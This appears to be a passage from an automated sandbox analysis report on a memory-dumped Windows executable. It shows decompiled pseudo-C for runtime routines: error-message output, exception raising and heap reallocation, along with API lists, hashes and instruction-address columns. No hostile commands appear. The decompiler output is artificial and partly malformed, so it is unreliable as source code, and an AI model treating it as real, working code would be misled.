                                                            0x0040d335
                                                            0x0040d34e
                                                            0x0040d350
                                                            0x0040d412
                                                            0x0040d412
                                                            0x0040d41c
                                                            0x0040d42a
                                                            0x0040d42a
                                                            0x0040d42e
                                                            0x0040d47b
                                                            0x0040d47d
                                                            0x0040d484
                                                            0x0040d48e
                                                            0x0040d49c
                                                            0x0040d49c
                                                            0x0040d4a0
                                                            0x0040d4a2
                                                            0x0040d4a7
                                                            0x0040d4ad
                                                            0x0040d4bd
                                                            0x0040d4c2
                                                            0x0040d4c2
                                                            0x0040d4a0
                                                            0x00000000
                                                            0x0040d430
                                                            0x0040d434
                                                            0x0040d46f
                                                            0x0040d479
                                                            0x00000000
                                                            0x0040d43c
                                                            0x0040d43f
                                                            0x0040d447
                                                            0x00000000
                                                            0x0040d460
                                                            0x0040d466
                                                            0x0040d46b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040d4c5
                                                            0x0040d4c8
                                                            0x00000000
                                                            0x0040d4c8
                                                            0x0040d447
                                                            0x0040d434
                                                            0x0040d42e
                                                            0x0040d35d
                                                            0x0040d36b
                                                            0x0040d36b
                                                            0x0040d36f
                                                            0x0040d37a
                                                            0x0040d37a
                                                            0x0040d37e
                                                            0x0040d3cb
                                                            0x0040d3d7
                                                            0x0040d40d
                                                            0x0040d3d9
                                                            0x0040d3dd
                                                            0x0040d3e3
                                                            0x0040d3e8
                                                            0x0040d3ed
                                                            0x0040d3f4
                                                            0x0040d3fa
                                                            0x0040d3ff
                                                            0x0040d404
                                                            0x0040d404
                                                            0x0040d3ed
                                                            0x0040d3dd
                                                            0x00000000
                                                            0x0040d380
                                                            0x0040d385
                                                            0x0040d38f
                                                            0x0040d39d
                                                            0x0040d39d
                                                            0x0040d3a1
                                                            0x00000000
                                                            0x0040d3a3
                                                            0x0040d3a3
                                                            0x0040d3a8
                                                            0x0040d3ae
                                                            0x0040d3be
                                                            0x00000000
                                                            0x0040d3c3
                                                            0x0040d3a1
                                                            0x0040d337
                                                            0x0040d343
                                                            0x0040d347
                                                            0x00000000
                                                            0x0040d349
                                                            0x0040d4ca
                                                            0x0040d4d1
                                                            0x0040d4d5
                                                            0x0040d4d8
                                                            0x0040d4db
                                                            0x0040d4e4
                                                            0x0040d4e4
                                                            0x00000000
                                                            0x0040d4ea
                                                            0x0040d347

                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                            • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                            0x004047b0
                                                            0x004047b3
                                                            0x004047b5
                                                            0x004047be
                                                            0x00404821
                                                            0x00404826
                                                            0x00404827
                                                            0x00404828
                                                            0x0040482a
                                                            0x004047c0
                                                            0x004047c9
                                                            0x004047d8
                                                            0x004047e4
                                                            0x004047e9
                                                            0x004047ef
                                                            0x004047fd
                                                            0x0040480b
                                                            0x0040481a
                                                            0x0040481a
                                                            0x00404832

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                            • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: 9@
                                                            • API String ID: 3320372497-3209974744
                                                            • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                            • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 62%
                                                            			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                            0x0041f0fd
                                                            0x0041f0fe
                                                            0x0041f101
                                                            0x0041f106
                                                            0x0041f107
                                                            0x0041f10c
                                                            0x0041f10f
                                                            0x0041f122
                                                            0x0041f124
                                                            0x0041f12c
                                                            0x0041f1ca
                                                            0x0041f1cf
                                                            0x0041f1de
                                                            0x0041f1f8
                                                            0x0041f132
                                                            0x0041f132
                                                            0x0041f13c
                                                            0x0041f15a
                                                            0x0041f15c
                                                            0x0041f16b
                                                            0x0041f188
                                                            0x0041f1a0
                                                            0x0041f1ba
                                                            0x0041f1ba
                                                            0x0041f1ff
                                                            0x0041f202
                                                            0x0041f205
                                                            0x0041f20d
                                                            0x0041f218

                                                            APIs
                                                              • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                              • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                            • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                            • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                            • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                            • String ID:
                                                            • API String ID: 135118572-0
                                                            • Opcode ID: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction ID: 441773961034998e17761d3334fa1b60ae8bad0ad03d42d5622a75f3c8f76c28
                                                            • Opcode Fuzzy Hash: 7bf27a680bd44ec5315003c7bd75f7b580991028cc1534cfff61cb99441fed85
                                                            • Instruction Fuzzy Hash: 7D31CF75640204BFE714E796CC42FDA77ACEB08704F9044BABA04F71D2DA786E548B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404464, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00404464(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                            0x00404464
                                                            0x00404464
                                                            0x00404464
                                                            0x0040446c
                                                            0x0040446e
                                                            0x004044fc
                                                            0x004044ff
                                                            0x0040476c
                                                            0x0040476d
                                                            0x0040476e
                                                            0x00404771
                                                            0x00403d9c
                                                            0x00403d9d
                                                            0x00403d9e
                                                            0x00403d9f
                                                            0x00403da0
                                                            0x00403da3
                                                            0x00403da5
                                                            0x00403dac
                                                            0x00403db5
                                                            0x00403dba
                                                            0x00403ea1
                                                            0x00403ea3
                                                            0x00403eb6
                                                            0x00403eb8
                                                            0x00403eba
                                                            0x00403ebc
                                                            0x00403ec2
                                                            0x00403ec6
                                                            0x00403ec6
                                                            0x00403ec9
                                                            0x00403ec9
                                                            0x00403ed2
                                                            0x00403ed9
                                                            0x00403ed9
                                                            0x00403ea5
                                                            0x00403ea5
                                                            0x00403eaa
                                                            0x00403eaa
                                                            0x00403dc0
                                                            0x00403dc9
                                                            0x00403dcf
                                                            0x00403dcb
                                                            0x00403dcb
                                                            0x00403dcb
                                                            0x00403ddb
                                                            0x00403dea
                                                            0x00403df7
                                                            0x00403e67
                                                            0x00403e6e
                                                            0x00403e70
                                                            0x00403e72
                                                            0x00403e74
                                                            0x00403e7a
                                                            0x00403e7e
                                                            0x00403e7e
                                                            0x00403e81
                                                            0x00403e81
                                                            0x00403e91
                                                            0x00403e98
                                                            0x00403e98
                                                            0x00403df9
                                                            0x00403df9
                                                            0x00403e05
                                                            0x00403e0b
                                                            0x00000000
                                                            0x00403e0d
                                                            0x00403e1e
                                                            0x00403e22
                                                            0x00403e24
                                                            0x00403e24
                                                            0x00403e3a
                                                            0x00000000
                                                            0x00403e52
                                                            0x00403e54
                                                            0x00403e57
                                                            0x00403e60
                                                            0x00403e63
                                                            0x00403e63
                                                            0x00403e3a
                                                            0x00403e0b
                                                            0x00403df7
                                                            0x00403ee7
                                                            0x00404777
                                                            0x00404777
                                                            0x00404779
                                                            0x00404779
                                                            0x00404505
                                                            0x00404507
                                                            0x0040450a
                                                            0x0040450b
                                                            0x0040450e
                                                            0x00404511
                                                            0x00404514
                                                            0x00404516
                                                            0x00404517
                                                            0x0040462c
                                                            0x0040462f
                                                            0x00404631
                                                            0x00404724
                                                            0x0040472f
                                                            0x00404736
                                                            0x00404738
                                                            0x0040473b
                                                            0x00404740
                                                            0x00404741
                                                            0x00404743
                                                            0x00000000
                                                            0x00404745
                                                            0x00404745
                                                            0x0040474b
                                                            0x0040474d
                                                            0x0040474d
                                                            0x00404750
                                                            0x00404758
                                                            0x0040475f
                                                            0x0040476a
                                                            0x0040476a
                                                            0x00404637
                                                            0x00404637
                                                            0x0040463a
                                                            0x0040463d
                                                            0x0040463f
                                                            0x00000000
                                                            0x00404645
                                                            0x00404645
                                                            0x0040464c
                                                            0x004046a9
                                                            0x004046a9
                                                            0x004046ae
                                                            0x004046b4
                                                            0x004046b9
                                                            0x004046ba
                                                            0x004046ba
                                                            0x004046c6
                                                            0x004046d7
                                                            0x004046dd
                                                            0x004046dd
                                                            0x004046df
                                                            0x004046ec
                                                            0x004046f3
                                                            0x004046f7
                                                            0x004046f9
                                                            0x004046ff
                                                            0x00404701
                                                            0x00404703
                                                            0x00404703
                                                            0x004046e1
                                                            0x004046e1
                                                            0x004046e5
                                                            0x004046e5
                                                            0x00404708
                                                            0x00404708
                                                            0x0040470a
                                                            0x0040470d
                                                            0x00404714
                                                            0x00404716
                                                            0x0040471a
                                                            0x0040464e
                                                            0x0040464e
                                                            0x00404653
                                                            0x0040465b
                                                            0x00000000
                                                            0x00000000
                                                            0x0040465d
                                                            0x0040465f
                                                            0x00404666
                                                            0x00000000
                                                            0x00404668
                                                            0x0040466c
                                                            0x00404671
                                                            0x00404672
                                                            0x00404678
                                                            0x00404680
                                                            0x00404686
                                                            0x0040468b
                                                            0x0040468c
                                                            0x00000000
                                                            0x0040468c
                                                            0x00404680
                                                            0x00000000
                                                            0x00404666
                                                            0x00404695
                                                            0x00404698
                                                            0x0040469b
                                                            0x0040469d
                                                            0x0040471d
                                                            0x0040471d
                                                            0x00000000
                                                            0x0040469f
                                                            0x0040469f
                                                            0x004046a2
                                                            0x004046a5
                                                            0x004046a7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004046a7
                                                            0x0040469d
                                                            0x0040464c
                                                            0x0040463f
                                                            0x0040451d
                                                            0x00404520
                                                            0x00404522
                                                            0x0040452c
                                                            0x00404532
                                                            0x00404549
                                                            0x00404549
                                                            0x00404555
                                                            0x0040455b
                                                            0x0040455d
                                                            0x00404564
                                                            0x00404566
                                                            0x0040456b
                                                            0x00404573
                                                            0x00000000
                                                            0x00000000
                                                            0x00404575
                                                            0x00404577
                                                            0x0040457e
                                                            0x00000000
                                                            0x00404580
                                                            0x00404583
                                                            0x00404588
                                                            0x0040458e
                                                            0x00404596
                                                            0x0040459b
                                                            0x004045a0
                                                            0x00000000
                                                            0x004045a0
                                                            0x00404596
                                                            0x00000000
                                                            0x0040457e
                                                            0x004045a9
                                                            0x004045a9
                                                            0x004045a9
                                                            0x004045ae
                                                            0x004045b1
                                                            0x004045b3
                                                            0x004045b6
                                                            0x004045b9
                                                            0x004045c4
                                                            0x004045c6
                                                            0x004045c9
                                                            0x004045cb
                                                            0x004045cd
                                                            0x004045d3
                                                            0x004045d5
                                                            0x004045d5
                                                            0x004045bb
                                                            0x004045be
                                                            0x004045be
                                                            0x004045da
                                                            0x004045e0
                                                            0x004045e4
                                                            0x004045ea
                                                            0x004045f1
                                                            0x004045f1
                                                            0x004045f6
                                                            0x00404603
                                                            0x00404534
                                                            0x00404534
                                                            0x0040453a
                                                            0x00404604
                                                            0x00404608
                                                            0x0040460d
                                                            0x0040460f
                                                            0x00404611
                                                            0x00404619
                                                            0x00404620
                                                            0x00404625
                                                            0x00404625
                                                            0x0040462b
                                                            0x00404540
                                                            0x00404540
                                                            0x00404545
                                                            0x00404547
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404547
                                                            0x0040453a
                                                            0x00404524
                                                            0x00404524
                                                            0x00404528
                                                            0x00404528
                                                            0x00404522
                                                            0x00404517
                                                            0x00404474
                                                            0x00404474
                                                            0x00404476
                                                            0x0040447a
                                                            0x0040447d
                                                            0x0040447f
                                                            0x004044b8
                                                            0x004044bc
                                                            0x004044bd
                                                            0x004044bf
                                                            0x004044c1
                                                            0x004044c3
                                                            0x004044c6
                                                            0x004044c8
                                                            0x004044ca
                                                            0x004044cf
                                                            0x004044d1
                                                            0x004044d3
                                                            0x004044d9
                                                            0x004044db
                                                            0x004044db
                                                            0x004044e2
                                                            0x004044e2
                                                            0x004044e5
                                                            0x004044e7
